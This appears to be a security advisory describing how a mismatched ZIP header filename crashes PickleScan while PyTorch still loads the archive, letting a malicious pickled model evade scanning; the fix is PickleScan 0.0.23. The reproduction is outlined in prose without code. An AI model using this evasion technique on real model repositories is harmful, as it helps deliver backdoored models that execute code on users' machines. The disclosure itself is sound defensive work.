PickleScan ZIP Archive Manipulation Vulnerability Leading to Denial-of-Service

A denial-of-service vulnerability has been identified in PickleScan versions prior to 0.0.23. The issue arises from a ZIP archive manipulation attack that causes PickleScan to crash while extracting and scanning PyTorch model archives. By altering the filename in the ZIP header and maintaining the original filename in the directory listing, an attacker can trigger a BadZipFile error in PickleScan. Although this error occurs, PyTorch's more lenient ZIP handling allows the model to be loaded, enabling malicious payloads to evade detection.

Impact

Exploitation of this vulnerability causes PickleScan to crash, disrupting the scanning process for malicious pickle files in PyTorch models. This could lead to the undetected loading of backdoored models, particularly from platforms like Hugging Face, into environments where they could cause harm.

Reproduction

The vulnerability can be reproduced by creating a PyTorch model that includes a malicious payload, such as a command to be executed. This model is then saved in a way that the ZIP header is modified to mislead PickleScan while keeping the original filename in the directory listing. When PickleScan attempts to scan the manipulated ZIP file, it crashes due to the header inconsistency, but PyTorch successfully loads the model, thereby executing the embedded payload.

Remediation

Users can upgrade to PickleScan version 0.0.23 or later, which addresses this vulnerability.